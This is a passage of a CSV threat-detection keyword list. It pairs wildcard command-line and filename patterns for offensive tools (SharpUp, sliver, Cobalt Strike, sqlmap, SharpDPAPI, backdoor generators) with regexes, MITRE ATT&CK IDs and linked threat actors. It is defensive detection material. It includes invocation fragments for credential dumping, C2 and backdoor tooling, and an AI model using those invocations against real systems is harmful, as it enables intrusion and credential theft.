no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","322" "* audit HijackablePaths*",".{0,1000}\saudit\sHijackablePaths.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","323" "* audit McAfeeSitelistFiles*",".{0,1000}\saudit\sMcAfeeSitelistFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","324" "* audit ModifiableScheduledTask*",".{0,1000}\saudit\sModifiableScheduledTask.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","325" "* audit ModifiableServiceBinaries*",".{0,1000}\saudit\sModifiableServiceBinaries.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. 
Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","326" "* audit ModifiableServiceRegistryKeys*",".{0,1000}\saudit\sModifiableServiceRegistryKeys.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","327" "* audit ModifiableServices*",".{0,1000}\saudit\sModifiableServices.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","328" "* audit ProcessDLLHijack*",".{0,1000}\saudit\sProcessDLLHijack.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","329" "* audit RegistryAutoLogons*",".{0,1000}\saudit\sRegistryAutoLogons.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","330" "* audit RegistryAutoruns*",".{0,1000}\saudit\sRegistryAutoruns.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","331" "* audit TokenPrivileges*",".{0,1000}\saudit\sTokenPrivileges.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","332" "* audit UnattendedInstallFiles*",".{0,1000}\saudit\sUnattendedInstallFiles.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. 
only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","333" "* audit UnquotedServicePath*",".{0,1000}\saudit\sUnquotedServicePath.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","334" "* auth --prt * --prt-sessionkey *",".{0,1000}\sauth\s\-\-prt\s.{0,1000}\s\-\-prt\-sessionkey\s.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","N/A","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","335" "* --authmode ntlm --username * --password *",".{0,1000}\s\-\-authmode\sntlm\s\-\-username\s.{0,1000}\s\-\-password\s.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","336" "* Author: Rob LP (@L3o4j)*",".{0,1000}\sAuthor\:\sRob\sLP\s\(\@L3o4j\).{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in 
PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","337" "* Author:ph4ntom*",".{0,1000}\sAuthor\:ph4ntom.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","338" "* auth-owners.nse*",".{0,1000}\sauth\-owners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","339" "* auth-spoof.nse*",".{0,1000}\sauth\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","340" "* AutoCrypt.ahk*",".{0,1000}\sAutoCrypt\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","341" "* autoNTDS.py*",".{0,1000}\sautoNTDS\.py.{0,1000}","offensive_tool_keyword","autoNTDS","autoNTDS is an automation script designed to simplify the process of dumping and cracking NTDS hashes using secretsdump.py and hashcat","T1003 - T1059 - T1021.002 - T1213","TA0006 - TA0008 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/hmaverickadams/autoNTDS","1","0","N/A","N/A","10","2","109","14","2023-10-31T22:03:58Z","2023-10-30T23:10:58Z","342" "* autorecon.py *",".{0,1000}\sautorecon\.py\s.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","343" "* AutoSUID.sh*",".{0,1000}\sAutoSUID\.sh.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID 
executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","7","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","344" "* avred.py *",".{0,1000}\savred\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","345" "* avredweb.py *",".{0,1000}\savredweb\.py\s.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","346" "* awsloot.py*",".{0,1000}\sawsloot\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","347" "* AzureHound.ps1*",".{0,1000}\sAzureHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","348" "* -b *.bin *.bin dump*",".{0,1000}\s\-b\s.{0,1000}\.bin\s.{0,1000}\.bin\sdump.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1550.004 - T1071 - T1606","TA0006 - TA0011 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","N/A","10","4","391","62","2024-08-12T08:13:42Z","2019-03-20T22:30:58Z","349" "* b64.ps1 *",".{0,1000}\sb64\.ps1\s.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","N/A","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","350" "* BabelStrike.py*",".{0,1000}\sBabelStrike\.py.{0,1000}","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. 
from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","N/A","1","2","132","23","2024-07-19T07:02:42Z","2023-01-10T07:59:00Z","351" "* --backdoor *",".{0,1000}\s\-\-backdoor\s.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","0","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","352" "* backdoor --profile windows-shellcode *",".{0,1000}\sbackdoor\s\-\-profile\swindows\-shellcode\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","353" "* backdoor.py*",".{0,1000}\sbackdoor\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","354" "* --backdoor-args *",".{0,1000}\s\-\-backdoor\-args\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team 
oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","355" "* backdoored-script.ps1*",".{0,1000}\sbackdoored\-script\.ps1.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","356" "* --backdoor-path *",".{0,1000}\s\-\-backdoor\-path\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","357" "* --backdoor-run *",".{0,1000}\s\-\-backdoor\-run\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","358" "* --backdoor-save *",".{0,1000}\s\-\-backdoor\-save\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","359" "* --backdoor-user 
*",".{0,1000}\s\-\-backdoor\-user\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","360" "* backhack.py*",".{0,1000}\sbackhack\.py.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","361" "* backorifice-brute.nse*",".{0,1000}\sbackorifice\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","362" "* backorifice-info.nse*",".{0,1000}\sbackorifice\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","363" "* backupcreds.exe*",".{0,1000}\sbackupcreds\.exe.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","364" "* backupkey* /server:* /file*.pvk*",".{0,1000}\sbackupkey.{0,1000}\s\/server\:.{0,1000}\s\/file.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","365" "* bacnet-info.nse*",".{0,1000}\sbacnet\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","366" "* badrat.ps1*",".{0,1000}\sbadrat\.ps1.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","367" "* badrat_cs.exe*",".{0,1000}\sbadrat_cs\.exe.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","368" "* badrat_server.py*",".{0,1000}\sbadrat_server\.py.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","369" "* BadWindowsService.exe*",".{0,1000}\sBadWindowsService\.exe.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/eladshamir/BadWindowsService","1","0","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","370" "* banner.nse*",".{0,1000}\sbanner\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","371" "* base64_encode_shellcode*",".{0,1000}\sbase64_encode_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil 
- RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","N/A","10","10","17","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z","372" "* bash ddexec.sh*",".{0,1000}\sbash\sddexec\.sh.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","373" "* --basic ""FUZZ:FUZ2Z""*",".{0,1000}\s\-\-basic\s\""FUZZ\:FUZ2Z\"".{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","374" "* --batch --dbs*",".{0,1000}\s\-\-batch\s\-\-dbs.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","375" "* --batch --password*",".{0,1000}\s\-\-batch\s\-\-password.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax 
Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","376" "* Bat-Potato.bat*",".{0,1000}\sBat\-Potato\.bat.{0,1000}","offensive_tool_keyword","Bat-Potato","Automating Juicy Potato Local Privilege Escalation CMD exploit for penetration testers","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/0x4xel/Bat-Potato","1","0","N/A","N/A","10","1","42","11","2022-12-13T20:19:51Z","2022-12-12T20:50:22Z","377" "* beacon.dll*",".{0,1000}\sbeacon\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit 
